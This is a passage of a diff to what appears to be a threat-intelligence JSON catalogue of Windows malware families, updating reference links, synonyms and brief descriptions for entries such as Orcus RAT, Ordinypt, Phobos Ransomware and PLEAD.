"https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] @@ -12677,11 +23269,27 @@ "uuid": "82733125-da67-44ff-b2ac-b16226088211", "value": "ONHAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni", + "https://www.bleepingcomputer.com/news/security/oni-ransomware-used-in-month-long-attacks-against-japanese-companies/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c182f370-4721-4968-a3b1-a7e96ab876df", + "value": "Oni Ransomware" + }, { "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "https://blog.f-secure.com/podcast-dukes-apt29/", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.f-secure.com/weblog/archives/00002764.html", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" ], @@ -12692,11 +23300,13 @@ "value": "OnionDuke" }, { - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", + "description": "A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html", + "https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html" ], "synonyms": [ "Onliner", @@ -12712,6 +23322,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], @@ -12738,7 +23349,7 @@ "value": "Opachki" }, { - "description": "", + "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", @@ -12781,7 +23392,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", - "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" ], "synonyms": [], "type": [] @@ -12794,28 +23406,36 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", - "https://orcustechnologies.com/", + "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", + "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], - "synonyms": [], + "synonyms": [ + "Schnorchel" + ], "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", "value": "Orcus RAT" }, { - "description": "", + "description": "This malware claims to be a ransomware, but it's actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration). ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", + "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", - "https://www.gdata.de/blog/2017/11/30151-ordinypt" + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/" + ], + "synonyms": [ + "GermanWiper", + "HSDFSDCrypt" ], - "synonyms": [], "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", @@ -12825,12 +23445,59 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", - "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski", + "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/", + "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer", + "https://twitter.com/albertzsigovits/status/1160874557454131200" ], "synonyms": [], "type": [] }, + "uuid": "414d8e68-77e7-4157-936a-d70d80e5efc0", + "value": "Oski Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno", + "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit" + ], + "synonyms": [ + "Babax" + ], + "type": [] + }, + "uuid": "e2be4da9-0a8f-45a5-a69b-7f16acb39398", + "value": "Osno" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt", + "https://id-ransomware.blogspot.com/2020/07/outcrypt-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "90e5a21a-c058-47a0-aa4d-bffde7ba698e", + "value": "OutCrypt Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", + "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf", + "https://twitter.com/VK_Intel/status/1085820673811992576", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [ + "FACADE" + ], + "type": [] + }, "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", "value": "Outlook Backdoor" }, @@ -12866,7 +23533,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/", + "https://www.secureworks.com/research/threat-profiles/bronze-union" ], "synonyms": [ "luckyowa" @@ -12876,6 +23544,45 @@ "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", "value": "owaauth" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy", + "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7a6d97a2-821f-4083-9180-3f70a851ad5e", + "value": "Owlproxy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ozh_rat", + "https://twitter.com/BushidoToken/status/1266075992679948289" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c9eefa23-4881-490f-abff-c78fe0c165ff", + "value": "OZH RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ozone", + "https://www.fortinet.com/blog/threat-research/german-speakers-targeted-by-spam-leading-to-ozone-rat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4e319700-9350-4656-91f5-0b495af4e8ad", + "value": "Ozone RAT" + }, { "description": "", "meta": { @@ -12911,17 +23618,15 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.youtube.com/watch?v=J7VOfAJvxEY", "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", - "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", - "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", - "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", - "https://www.spamhaus.org/news/article/771/", - "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", - "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", - "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.spamhaus.org/news/article/771/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", - "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" ], @@ -12933,6 +23638,41 @@ "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", "value": "PandaBanker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise", + "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again", + "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/", + "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4f7e7602-79f8-4eea-8239-fb2d4ceadb9f", + "value": "Paradise Ransomware" + }, + { + "description": "Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous \"coronamalware\" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax", + "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html", + "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", + "https://blog.morphisec.com/parallax-rat-active-status", + "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/", + "https://twitter.com/malwrhunterteam/status/1227196799997431809" + ], + "synonyms": [ + "ParallaxRAT" + ], + "type": [] + }, + "uuid": "39f74f33-467e-47a4-bd2f-e0a191dee9ca", + "value": "Parallax RAT" + }, { "description": "", "meta": { @@ -12946,6 +23686,68 @@ "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock", + "https://id-ransomware.blogspot.com" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8", + "value": "Passlock Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key", + "https://research.checkpoint.com/2020/ransomware-alert-pay2key/", + "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" + ], + "synonyms": [ + "Cobalt" + ], + "type": [] + }, + "uuid": "46dc64c6-e927-44fc-b4a4-efd1677ae030", + "value": "Pay2Key" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c", + "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1", + "https://blog.reversinglabs.com/blog/hidden-cobra" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d6da9699-778c-4c97-82f4-1e9113283bd4", + "value": "PEBBLEDASH" + }, + { + "description": "PeddleCheap is a module of the DanderSpritz framework which surface with the \"Lost in Translation\" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap", + "https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#", + "https://twitter.com/ESETresearch/status/1258353960781598721", + "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ee450087-00e4-4b59-9ea7-6650d5551ea9", + "value": "PeddleCheap" + }, { "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", "meta": { @@ -12959,6 +23761,19 @@ "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", "value": "Peepy RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut", + "https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing" + ], + "synonyms": [], + "type": [] + }, + "uuid": "88f636b9-9c2e-4faf-ab83-b91009bf47fc", + "value": "Pekraut" + }, { "description": "", "meta": { @@ -12992,9 +23807,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", + "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] @@ -13006,8 +23823,7 @@ "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", - "https://community.fireeye.com/external/1093" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift" ], "synonyms": [ "ReRol" @@ -13036,9 +23852,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" ], "synonyms": [], @@ -13047,12 +23864,48 @@ "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d061daca-4415-4b3e-9034-231e37857eed", + "value": "Phobos Ransomware" + }, + { + "description": "Keylogger, information stealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger", + "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger" + ], + "synonyms": [], + "type": [] + }, + "uuid": "601ea680-68ec-43c9-ba20-88eaaefe8818", + "value": "Phoenix Keylogger" + }, { "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", - "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" ], "synonyms": [ "Rizzo" @@ -13067,11 +23920,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", - "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://research.checkpoint.com/2019/phorpiex-breakdown/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" + "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" ], "synonyms": [ "Trik" @@ -13081,6 +23942,47 @@ "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, + { + "description": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2eb298de-e14b-46c1-a45f-26ae0d2c4003", + "value": "PICKPOCKET" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2bda00e8-e6a7-448d-8dfa-4f2276230e8b", + "value": "Pierogi" + }, + { + "description": "According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory.\r\n Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged)\r\n Contains additional backdoor capabilities including:\r\n Running processes\r\n Downloading and executing files (T1105: Remote File Copy)\r\n Downloading and injecting DLLs (T1055: Process Injection)\r\n Communicates with a command and control (C2) server over HTTP using AES encrypted messages\r\n (T1071: Standard Application Layer Protocol)\r\n (T1032: Standard Cryptographic Protocol)\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38", + "value": "PILLOWMINT" + }, { "description": "", "meta": { @@ -13099,9 +24001,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", - "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", + "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", + "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ], + "synonyms": [ + "CookieCutter", + "SHOTPUT" ], - "synonyms": [], "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", @@ -13112,8 +24021,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", + "https://isc.sans.edu/diary/rss/25068", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" + "https://johannesbader.ch/2019/07/the-dga-of-pitou/" ], "synonyms": [], "type": [] @@ -13141,7 +24052,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", - "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" ], "synonyms": [ @@ -13159,6 +24069,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], @@ -13181,39 +24093,43 @@ "value": "playwork" }, { - "description": "", + "description": "PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", + "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html", + "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", + "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html", "http://www.freebuf.com/column/159865.html", - "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", - "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", - "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf" + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", + "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/" ], "synonyms": [ - "TSCookie" + "DRAWDOWN", + "GOODTIMES", + "Linopid" ], "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD" - }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor" + "value": "PLEAD (Windows)" }, { "description": "", @@ -13221,7 +24137,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", - "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html", + 